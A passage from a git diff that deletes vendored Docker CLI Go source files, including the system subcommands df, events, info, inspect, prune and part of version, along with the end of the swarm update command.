- return cmd -} - -func runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts swarmOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - var updateFlags swarm.UpdateFlags - - swarm, err := client.SwarmInspect(ctx) - if err != nil { - return err - } - - prevAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers - - opts.mergeSwarmSpec(&swarm.Spec, flags) - - curAutoLock := swarm.Spec.EncryptionConfig.AutoLockManagers - - err = client.SwarmUpdate(ctx, swarm.Version, swarm.Spec, updateFlags) - if err != nil { - return err - } - - fmt.Fprintln(dockerCli.Out(), "Swarm updated.") - - if curAutoLock && !prevAutoLock { - unlockKeyResp, err := client.SwarmGetUnlockKey(ctx) - if err != nil { - return errors.Wrap(err, "could not fetch unlock key") - } - printUnlockCommand(ctx, dockerCli, 
unlockKeyResp.UnlockKey) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/system/cmd.go b/vendor/github.com/docker/docker/cli/command/system/cmd.go deleted file mode 100644 index ab3beb895a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/cmd.go +++ /dev/null @@ -1,26 +0,0 @@ -package system - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewSystemCommand returns a cobra command for `system` subcommands -func NewSystemCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "system", - Short: "Manage Docker", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - NewEventsCommand(dockerCli), - NewInfoCommand(dockerCli), - NewDiskUsageCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/system/df.go b/vendor/github.com/docker/docker/cli/command/system/df.go deleted file mode 100644 index 9f712484aa..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/df.go +++ /dev/null @@ -1,56 +0,0 @@ -package system - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type diskUsageOptions struct { - verbose bool -} - -// NewDiskUsageCommand creates a new cobra.Command for `docker df` -func NewDiskUsageCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts diskUsageOptions - - cmd := &cobra.Command{ - Use: "df [OPTIONS]", - Short: "Show docker disk usage", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runDiskUsage(dockerCli, opts) - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.verbose, "verbose", "v", false, "Show detailed information on space usage") - - return cmd -} - 
-func runDiskUsage(dockerCli *command.DockerCli, opts diskUsageOptions) error { - du, err := dockerCli.Client().DiskUsage(context.Background()) - if err != nil { - return err - } - - duCtx := formatter.DiskUsageContext{ - Context: formatter.Context{ - Output: dockerCli.Out(), - }, - LayersSize: du.LayersSize, - Images: du.Images, - Containers: du.Containers, - Volumes: du.Volumes, - Verbose: opts.verbose, - } - - duCtx.Write() - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/system/events.go b/vendor/github.com/docker/docker/cli/command/system/events.go deleted file mode 100644 index 087523051a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/events.go +++ /dev/null @@ -1,140 +0,0 @@ -package system - -import ( - "fmt" - "io" - "io/ioutil" - "sort" - "strings" - "text/template" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - eventtypes "github.com/docker/docker/api/types/events" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/jsonlog" - "github.com/docker/docker/utils/templates" - "github.com/spf13/cobra" -) - -type eventsOptions struct { - since string - until string - filter opts.FilterOpt - format string -} - -// NewEventsCommand creates a new cobra.Command for `docker events` -func NewEventsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := eventsOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "events [OPTIONS]", - Short: "Get real time events from the server", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runEvents(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.StringVar(&opts.since, "since", "", "Show all events created since timestamp") - flags.StringVar(&opts.until, "until", "", "Stream events until this timestamp") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions 
provided") - flags.StringVar(&opts.format, "format", "", "Format the output using the given Go template") - - return cmd -} - -func runEvents(dockerCli *command.DockerCli, opts *eventsOptions) error { - tmpl, err := makeTemplate(opts.format) - if err != nil { - return cli.StatusError{ - StatusCode: 64, - Status: "Error parsing format: " + err.Error()} - } - options := types.EventsOptions{ - Since: opts.since, - Until: opts.until, - Filters: opts.filter.Value(), - } - - ctx, cancel := context.WithCancel(context.Background()) - events, errs := dockerCli.Client().Events(ctx, options) - defer cancel() - - out := dockerCli.Out() - - for { - select { - case event := <-events: - if err := handleEvent(out, event, tmpl); err != nil { - return err - } - case err := <-errs: - if err == io.EOF { - return nil - } - return err - } - } -} - -func handleEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error { - if tmpl == nil { - return prettyPrintEvent(out, event) - } - - return formatEvent(out, event, tmpl) -} - -func makeTemplate(format string) (*template.Template, error) { - if format == "" { - return nil, nil - } - tmpl, err := templates.Parse(format) - if err != nil { - return tmpl, err - } - // we execute the template for an empty message, so as to validate - // a bad template like "{{.badFieldString}}" - return tmpl, tmpl.Execute(ioutil.Discard, &eventtypes.Message{}) -} - -// prettyPrintEvent prints all types of event information. -// Each output includes the event type, actor id, name and action. -// Actor attributes are printed at the end if the actor has any. 
-func prettyPrintEvent(out io.Writer, event eventtypes.Message) error { - if event.TimeNano != 0 { - fmt.Fprintf(out, "%s ", time.Unix(0, event.TimeNano).Format(jsonlog.RFC3339NanoFixed)) - } else if event.Time != 0 { - fmt.Fprintf(out, "%s ", time.Unix(event.Time, 0).Format(jsonlog.RFC3339NanoFixed)) - } - - fmt.Fprintf(out, "%s %s %s", event.Type, event.Action, event.Actor.ID) - - if len(event.Actor.Attributes) > 0 { - var attrs []string - var keys []string - for k := range event.Actor.Attributes { - keys = append(keys, k) - } - sort.Strings(keys) - for _, k := range keys { - v := event.Actor.Attributes[k] - attrs = append(attrs, fmt.Sprintf("%s=%s", k, v)) - } - fmt.Fprintf(out, " (%s)", strings.Join(attrs, ", ")) - } - fmt.Fprint(out, "\n") - return nil -} - -func formatEvent(out io.Writer, event eventtypes.Message, tmpl *template.Template) error { - defer out.Write([]byte{'\n'}) - return tmpl.Execute(out, event) -} diff --git a/vendor/github.com/docker/docker/cli/command/system/info.go b/vendor/github.com/docker/docker/cli/command/system/info.go deleted file mode 100644 index e0b8767377..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/info.go +++ /dev/null @@ -1,334 +0,0 @@ -package system - -import ( - "fmt" - "sort" - "strings" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/utils" - "github.com/docker/docker/utils/templates" - "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type infoOptions struct { - format string -} - -// NewInfoCommand creates a new cobra.Command for `docker info` -func NewInfoCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts infoOptions - - cmd := &cobra.Command{ - Use: "info [OPTIONS]", - Short: "Display system-wide information", - Args: cli.NoArgs, - RunE: func(cmd 
*cobra.Command, args []string) error { - return runInfo(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - - return cmd -} - -func runInfo(dockerCli *command.DockerCli, opts *infoOptions) error { - ctx := context.Background() - info, err := dockerCli.Client().Info(ctx) - if err != nil { - return err - } - if opts.format == "" { - return prettyPrintInfo(dockerCli, info) - } - return formatInfo(dockerCli, info, opts.format) -} - -func prettyPrintInfo(dockerCli *command.DockerCli, info types.Info) error { - fmt.Fprintf(dockerCli.Out(), "Containers: %d\n", info.Containers) - fmt.Fprintf(dockerCli.Out(), " Running: %d\n", info.ContainersRunning) - fmt.Fprintf(dockerCli.Out(), " Paused: %d\n", info.ContainersPaused) - fmt.Fprintf(dockerCli.Out(), " Stopped: %d\n", info.ContainersStopped) - fmt.Fprintf(dockerCli.Out(), "Images: %d\n", info.Images) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Server Version: %s\n", info.ServerVersion) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Storage Driver: %s\n", info.Driver) - if info.DriverStatus != nil { - for _, pair := range info.DriverStatus { - fmt.Fprintf(dockerCli.Out(), " %s: %s\n", pair[0], pair[1]) - - // print a warning if devicemapper is using a loopback file - if pair[0] == "Data loop file" { - fmt.Fprintln(dockerCli.Err(), " WARNING: Usage of loopback devices is strongly discouraged for production use. 
Use `--storage-opt dm.thinpooldev` to specify a custom block storage device.") - } - } - - } - if info.SystemStatus != nil { - for _, pair := range info.SystemStatus { - fmt.Fprintf(dockerCli.Out(), "%s: %s\n", pair[0], pair[1]) - } - } - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Logging Driver: %s\n", info.LoggingDriver) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Cgroup Driver: %s\n", info.CgroupDriver) - - fmt.Fprintf(dockerCli.Out(), "Plugins: \n") - fmt.Fprintf(dockerCli.Out(), " Volume:") - fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Volume, " ")) - fmt.Fprintf(dockerCli.Out(), "\n") - fmt.Fprintf(dockerCli.Out(), " Network:") - fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Network, " ")) - fmt.Fprintf(dockerCli.Out(), "\n") - - if len(info.Plugins.Authorization) != 0 { - fmt.Fprintf(dockerCli.Out(), " Authorization:") - fmt.Fprintf(dockerCli.Out(), " %s", strings.Join(info.Plugins.Authorization, " ")) - fmt.Fprintf(dockerCli.Out(), "\n") - } - - fmt.Fprintf(dockerCli.Out(), "Swarm: %v\n", info.Swarm.LocalNodeState) - if info.Swarm.LocalNodeState != swarm.LocalNodeStateInactive && info.Swarm.LocalNodeState != swarm.LocalNodeStateLocked { - fmt.Fprintf(dockerCli.Out(), " NodeID: %s\n", info.Swarm.NodeID) - if info.Swarm.Error != "" { - fmt.Fprintf(dockerCli.Out(), " Error: %v\n", info.Swarm.Error) - } - fmt.Fprintf(dockerCli.Out(), " Is Manager: %v\n", info.Swarm.ControlAvailable) - if info.Swarm.ControlAvailable { - fmt.Fprintf(dockerCli.Out(), " ClusterID: %s\n", info.Swarm.Cluster.ID) - fmt.Fprintf(dockerCli.Out(), " Managers: %d\n", info.Swarm.Managers) - fmt.Fprintf(dockerCli.Out(), " Nodes: %d\n", info.Swarm.Nodes) - fmt.Fprintf(dockerCli.Out(), " Orchestration:\n") - taskHistoryRetentionLimit := int64(0) - if info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit != nil { - taskHistoryRetentionLimit = *info.Swarm.Cluster.Spec.Orchestration.TaskHistoryRetentionLimit - } - fmt.Fprintf(dockerCli.Out(), " Task 
History Retention Limit: %d\n", taskHistoryRetentionLimit) - fmt.Fprintf(dockerCli.Out(), " Raft:\n") - fmt.Fprintf(dockerCli.Out(), " Snapshot Interval: %d\n", info.Swarm.Cluster.Spec.Raft.SnapshotInterval) - if info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots != nil { - fmt.Fprintf(dockerCli.Out(), " Number of Old Snapshots to Retain: %d\n", *info.Swarm.Cluster.Spec.Raft.KeepOldSnapshots) - } - fmt.Fprintf(dockerCli.Out(), " Heartbeat Tick: %d\n", info.Swarm.Cluster.Spec.Raft.HeartbeatTick) - fmt.Fprintf(dockerCli.Out(), " Election Tick: %d\n", info.Swarm.Cluster.Spec.Raft.ElectionTick) - fmt.Fprintf(dockerCli.Out(), " Dispatcher:\n") - fmt.Fprintf(dockerCli.Out(), " Heartbeat Period: %s\n", units.HumanDuration(time.Duration(info.Swarm.Cluster.Spec.Dispatcher.HeartbeatPeriod))) - fmt.Fprintf(dockerCli.Out(), " CA Configuration:\n") - fmt.Fprintf(dockerCli.Out(), " Expiry Duration: %s\n", units.HumanDuration(info.Swarm.Cluster.Spec.CAConfig.NodeCertExpiry)) - if len(info.Swarm.Cluster.Spec.CAConfig.ExternalCAs) > 0 { - fmt.Fprintf(dockerCli.Out(), " External CAs:\n") - for _, entry := range info.Swarm.Cluster.Spec.CAConfig.ExternalCAs { - fmt.Fprintf(dockerCli.Out(), " %s: %s\n", entry.Protocol, entry.URL) - } - } - } - fmt.Fprintf(dockerCli.Out(), " Node Address: %s\n", info.Swarm.NodeAddr) - managers := []string{} - for _, entry := range info.Swarm.RemoteManagers { - managers = append(managers, entry.Addr) - } - if len(managers) > 0 { - sort.Strings(managers) - fmt.Fprintf(dockerCli.Out(), " Manager Addresses:\n") - for _, entry := range managers { - fmt.Fprintf(dockerCli.Out(), " %s\n", entry) - } - } - } - - if len(info.Runtimes) > 0 { - fmt.Fprintf(dockerCli.Out(), "Runtimes:") - for name := range info.Runtimes { - fmt.Fprintf(dockerCli.Out(), " %s", name) - } - fmt.Fprint(dockerCli.Out(), "\n") - fmt.Fprintf(dockerCli.Out(), "Default Runtime: %s\n", info.DefaultRuntime) - } - - if info.OSType == "linux" { - fmt.Fprintf(dockerCli.Out(), "Init Binary: %v\n", 
info.InitBinary) - - for _, ci := range []struct { - Name string - Commit types.Commit - }{ - {"containerd", info.ContainerdCommit}, - {"runc", info.RuncCommit}, - {"init", info.InitCommit}, - } { - fmt.Fprintf(dockerCli.Out(), "%s version: %s", ci.Name, ci.Commit.ID) - if ci.Commit.ID != ci.Commit.Expected { - fmt.Fprintf(dockerCli.Out(), " (expected: %s)", ci.Commit.Expected) - } - fmt.Fprintf(dockerCli.Out(), "\n") - } - if len(info.SecurityOptions) != 0 { - kvs, err := types.DecodeSecurityOptions(info.SecurityOptions) - if err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "Security Options:\n") - for _, so := range kvs { - fmt.Fprintf(dockerCli.Out(), " %s\n", so.Name) - for _, o := range so.Options { - switch o.Key { - case "profile": - if o.Value != "default" { - fmt.Fprintf(dockerCli.Err(), " WARNING: You're not using the default seccomp profile\n") - } - fmt.Fprintf(dockerCli.Out(), " Profile: %s\n", o.Value) - } - } - } - } - } - - // Isolation only has meaning on a Windows daemon. 
- if info.OSType == "windows" { - fmt.Fprintf(dockerCli.Out(), "Default Isolation: %v\n", info.Isolation) - } - - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Kernel Version: %s\n", info.KernelVersion) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Operating System: %s\n", info.OperatingSystem) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "OSType: %s\n", info.OSType) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Architecture: %s\n", info.Architecture) - fmt.Fprintf(dockerCli.Out(), "CPUs: %d\n", info.NCPU) - fmt.Fprintf(dockerCli.Out(), "Total Memory: %s\n", units.BytesSize(float64(info.MemTotal))) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Name: %s\n", info.Name) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "ID: %s\n", info.ID) - fmt.Fprintf(dockerCli.Out(), "Docker Root Dir: %s\n", info.DockerRootDir) - fmt.Fprintf(dockerCli.Out(), "Debug Mode (client): %v\n", utils.IsDebugEnabled()) - fmt.Fprintf(dockerCli.Out(), "Debug Mode (server): %v\n", info.Debug) - - if info.Debug { - fmt.Fprintf(dockerCli.Out(), " File Descriptors: %d\n", info.NFd) - fmt.Fprintf(dockerCli.Out(), " Goroutines: %d\n", info.NGoroutines) - fmt.Fprintf(dockerCli.Out(), " System Time: %s\n", info.SystemTime) - fmt.Fprintf(dockerCli.Out(), " EventsListeners: %d\n", info.NEventsListener) - } - - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Http Proxy: %s\n", info.HTTPProxy) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "Https Proxy: %s\n", info.HTTPSProxy) - ioutils.FprintfIfNotEmpty(dockerCli.Out(), "No Proxy: %s\n", info.NoProxy) - - if info.IndexServerAddress != "" { - u := dockerCli.ConfigFile().AuthConfigs[info.IndexServerAddress].Username - if len(u) > 0 { - fmt.Fprintf(dockerCli.Out(), "Username: %v\n", u) - } - fmt.Fprintf(dockerCli.Out(), "Registry: %v\n", info.IndexServerAddress) - } - - // Only output these warnings if the server does not support these features - if info.OSType != "windows" { - if !info.MemoryLimit { - fmt.Fprintln(dockerCli.Err(), "WARNING: No memory limit support") - 
} - if !info.SwapLimit { - fmt.Fprintln(dockerCli.Err(), "WARNING: No swap limit support") - } - if !info.KernelMemory { - fmt.Fprintln(dockerCli.Err(), "WARNING: No kernel memory limit support") - } - if !info.OomKillDisable { - fmt.Fprintln(dockerCli.Err(), "WARNING: No oom kill disable support") - } - if !info.CPUCfsQuota { - fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs quota support") - } - if !info.CPUCfsPeriod { - fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu cfs period support") - } - if !info.CPUShares { - fmt.Fprintln(dockerCli.Err(), "WARNING: No cpu shares support") - } - if !info.CPUSet { - fmt.Fprintln(dockerCli.Err(), "WARNING: No cpuset support") - } - if !info.IPv4Forwarding { - fmt.Fprintln(dockerCli.Err(), "WARNING: IPv4 forwarding is disabled") - } - if !info.BridgeNfIptables { - fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-iptables is disabled") - } - if !info.BridgeNfIP6tables { - fmt.Fprintln(dockerCli.Err(), "WARNING: bridge-nf-call-ip6tables is disabled") - } - } - - if info.Labels != nil { - fmt.Fprintln(dockerCli.Out(), "Labels:") - for _, attribute := range info.Labels { - fmt.Fprintf(dockerCli.Out(), " %s\n", attribute) - } - // TODO: Engine labels with duplicate keys has been deprecated in 1.13 and will be error out - // after 3 release cycles (1.16). For now, a WARNING will be generated. The following will - // be removed eventually. 
- labelMap := map[string]string{} - for _, label := range info.Labels { - stringSlice := strings.SplitN(label, "=", 2) - if len(stringSlice) > 1 { - // If there is a conflict we will throw out an warning - if v, ok := labelMap[stringSlice[0]]; ok && v != stringSlice[1] { - fmt.Fprintln(dockerCli.Err(), "WARNING: labels with duplicate keys and conflicting values have been deprecated") - break - } - labelMap[stringSlice[0]] = stringSlice[1] - } - } - } - - fmt.Fprintf(dockerCli.Out(), "Experimental: %v\n", info.ExperimentalBuild) - if info.ClusterStore != "" { - fmt.Fprintf(dockerCli.Out(), "Cluster Store: %s\n", info.ClusterStore) - } - - if info.ClusterAdvertise != "" { - fmt.Fprintf(dockerCli.Out(), "Cluster Advertise: %s\n", info.ClusterAdvertise) - } - - if info.RegistryConfig != nil && (len(info.RegistryConfig.InsecureRegistryCIDRs) > 0 || len(info.RegistryConfig.IndexConfigs) > 0) { - fmt.Fprintln(dockerCli.Out(), "Insecure Registries:") - for _, registry := range info.RegistryConfig.IndexConfigs { - if registry.Secure == false { - fmt.Fprintf(dockerCli.Out(), " %s\n", registry.Name) - } - } - - for _, registry := range info.RegistryConfig.InsecureRegistryCIDRs { - mask, _ := registry.Mask.Size() - fmt.Fprintf(dockerCli.Out(), " %s/%d\n", registry.IP.String(), mask) - } - } - - if info.RegistryConfig != nil && len(info.RegistryConfig.Mirrors) > 0 { - fmt.Fprintln(dockerCli.Out(), "Registry Mirrors:") - for _, mirror := range info.RegistryConfig.Mirrors { - fmt.Fprintf(dockerCli.Out(), " %s\n", mirror) - } - } - - fmt.Fprintf(dockerCli.Out(), "Live Restore Enabled: %v\n", info.LiveRestoreEnabled) - - return nil -} - -func formatInfo(dockerCli *command.DockerCli, info types.Info, format string) error { - tmpl, err := templates.Parse(format) - if err != nil { - return cli.StatusError{StatusCode: 64, - Status: "Template parsing error: " + err.Error()} - } - err = tmpl.Execute(dockerCli.Out(), info) - dockerCli.Out().Write([]byte{'\n'}) - return err -} diff --git 
a/vendor/github.com/docker/docker/cli/command/system/inspect.go b/vendor/github.com/docker/docker/cli/command/system/inspect.go deleted file mode 100644 index c86e858a29..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/inspect.go +++ /dev/null @@ -1,203 +0,0 @@ -package system - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - apiclient "github.com/docker/docker/client" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - inspectType string - size bool - ids []string -} - -// NewInspectCommand creates a new cobra.Command for `docker inspect` -func NewInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] NAME|ID [NAME|ID...]", - Short: "Return low-level information on Docker objects", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.ids = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - flags.StringVar(&opts.inspectType, "type", "", "Return JSON for specified type") - flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes if the type is container") - - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - var elementSearcher inspect.GetRefFunc - switch opts.inspectType { - case "", "container", "image", "node", "network", "service", "volume", "task", "plugin": - elementSearcher = inspectAll(context.Background(), dockerCli, opts.size, opts.inspectType) - default: - return fmt.Errorf("%q is not a valid value for --type", opts.inspectType) - } - return inspect.Inspect(dockerCli.Out(), opts.ids, opts.format, elementSearcher) -} - -func inspectContainers(ctx 
context.Context, dockerCli *command.DockerCli, getSize bool) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().ContainerInspectWithRaw(ctx, ref, getSize) - } -} - -func inspectImages(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().ImageInspectWithRaw(ctx, ref) - } -} - -func inspectNetwork(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().NetworkInspectWithRaw(ctx, ref) - } -} - -func inspectNode(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().NodeInspectWithRaw(ctx, ref) - } -} - -func inspectService(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().ServiceInspectWithRaw(ctx, ref) - } -} - -func inspectTasks(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().TaskInspectWithRaw(ctx, ref) - } -} - -func inspectVolume(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().VolumeInspectWithRaw(ctx, ref) - } -} - -func inspectPlugin(ctx context.Context, dockerCli *command.DockerCli) inspect.GetRefFunc { - return func(ref string) (interface{}, []byte, error) { - return dockerCli.Client().PluginInspectWithRaw(ctx, ref) - } -} - -func inspectAll(ctx context.Context, dockerCli *command.DockerCli, getSize bool, typeConstraint string) inspect.GetRefFunc { - var inspectAutodetect = []struct { - objectType string - isSizeSupported bool - isSwarmObject bool - objectInspector func(string) 
(interface{}, []byte, error) - }{ - { - objectType: "container", - isSizeSupported: true, - objectInspector: inspectContainers(ctx, dockerCli, getSize), - }, - { - objectType: "image", - objectInspector: inspectImages(ctx, dockerCli), - }, - { - objectType: "network", - objectInspector: inspectNetwork(ctx, dockerCli), - }, - { - objectType: "volume", - objectInspector: inspectVolume(ctx, dockerCli), - }, - { - objectType: "service", - isSwarmObject: true, - objectInspector: inspectService(ctx, dockerCli), - }, - { - objectType: "task", - isSwarmObject: true, - objectInspector: inspectTasks(ctx, dockerCli), - }, - { - objectType: "node", - isSwarmObject: true, - objectInspector: inspectNode(ctx, dockerCli), - }, - { - objectType: "plugin", - objectInspector: inspectPlugin(ctx, dockerCli), - }, - } - - // isSwarmManager does an Info API call to verify that the daemon is - // a swarm manager. - isSwarmManager := func() bool { - info, err := dockerCli.Client().Info(ctx) - if err != nil { - fmt.Fprintln(dockerCli.Err(), err) - return false - } - return info.Swarm.ControlAvailable - } - - isErrNotSupported := func(err error) bool { - return strings.Contains(err.Error(), "not supported") - } - - return func(ref string) (interface{}, []byte, error) { - const ( - swarmSupportUnknown = iota - swarmSupported - swarmUnsupported - ) - - isSwarmSupported := swarmSupportUnknown - - for _, inspectData := range inspectAutodetect { - if typeConstraint != "" && inspectData.objectType != typeConstraint { - continue - } - if typeConstraint == "" && inspectData.isSwarmObject { - if isSwarmSupported == swarmSupportUnknown { - if isSwarmManager() { - isSwarmSupported = swarmSupported - } else { - isSwarmSupported = swarmUnsupported - } - } - if isSwarmSupported == swarmUnsupported { - continue - } - } - v, raw, err := inspectData.objectInspector(ref) - if err != nil { - if typeConstraint == "" && (apiclient.IsErrNotFound(err) || isErrNotSupported(err)) { - continue - } - return v, raw, 
err - } - if getSize && !inspectData.isSizeSupported { - fmt.Fprintf(dockerCli.Err(), "WARNING: --size ignored for %s\n", inspectData.objectType) - } - return v, raw, err - } - return nil, nil, fmt.Errorf("Error: No such object: %s", ref) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/system/prune.go b/vendor/github.com/docker/docker/cli/command/system/prune.go deleted file mode 100644 index 92dddbdca6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/prune.go +++ /dev/null @@ -1,93 +0,0 @@ -package system - -import ( - "fmt" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/prune" - units "github.com/docker/go-units" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool - all bool -} - -// NewPruneCommand creates a new cobra.Command for `docker prune` -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - cmd := &cobra.Command{ - Use: "prune [OPTIONS]", - Short: "Remove unused data", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runPrune(dockerCli, opts) - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") - flags.BoolVarP(&opts.all, "all", "a", false, "Remove all unused images not just dangling ones") - - return cmd -} - -const ( - warning = `WARNING! 
This will remove: - - all stopped containers - - all volumes not used by at least one container - - all networks not used by at least one container - %s -Are you sure you want to continue?` - - danglingImageDesc = "- all dangling images" - allImageDesc = `- all images without at least one container associated to them` -) - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) error { - var message string - - if opts.all { - message = fmt.Sprintf(warning, allImageDesc) - } else { - message = fmt.Sprintf(warning, danglingImageDesc) - } - - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), message) { - return nil - } - - var spaceReclaimed uint64 - - for _, pruneFn := range []func(dockerCli *command.DockerCli) (uint64, string, error){ - prune.RunContainerPrune, - prune.RunVolumePrune, - prune.RunNetworkPrune, - } { - spc, output, err := pruneFn(dockerCli) - if err != nil { - return err - } - spaceReclaimed += spc - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - } - - spc, output, err := prune.RunImagePrune(dockerCli, opts.all) - if err != nil { - return err - } - if spc > 0 { - spaceReclaimed += spc - fmt.Fprintln(dockerCli.Out(), output) - } - - fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/system/version.go b/vendor/github.com/docker/docker/cli/command/system/version.go deleted file mode 100644 index ded4f4d118..0000000000 --- a/vendor/github.com/docker/docker/cli/command/system/version.go +++ /dev/null @@ -1,113 +0,0 @@ -package system - -import ( - "fmt" - "runtime" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/utils/templates" - "github.com/spf13/cobra" -) - -var versionTemplate = `Client: - Version: 
{{.Client.Version}} - API version: {{.Client.APIVersion}} - Go version: {{.Client.GoVersion}} - Git commit: {{.Client.GitCommit}} - Built: {{.Client.BuildTime}} - OS/Arch: {{.Client.Os}}/{{.Client.Arch}}{{if .ServerOK}} - -Server: - Version: {{.Server.Version}} - API version: {{.Server.APIVersion}} (minimum version {{.Server.MinAPIVersion}}) - Go version: {{.Server.GoVersion}} - Git commit: {{.Server.GitCommit}} - Built: {{.Server.BuildTime}} - OS/Arch: {{.Server.Os}}/{{.Server.Arch}} - Experimental: {{.Server.Experimental}}{{end}}` - -type versionOptions struct { - format string -} - -// NewVersionCommand creates a new cobra.Command for `docker version` -func NewVersionCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts versionOptions - - cmd := &cobra.Command{ - Use: "version [OPTIONS]", - Short: "Show the Docker version information", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runVersion(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - - return cmd -} - -func runVersion(dockerCli *command.DockerCli, opts *versionOptions) error { - ctx := context.Background() - - templateFormat := versionTemplate - if opts.format != "" { - templateFormat = opts.format - } - - tmpl, err := templates.Parse(templateFormat) - if err != nil { - return cli.StatusError{StatusCode: 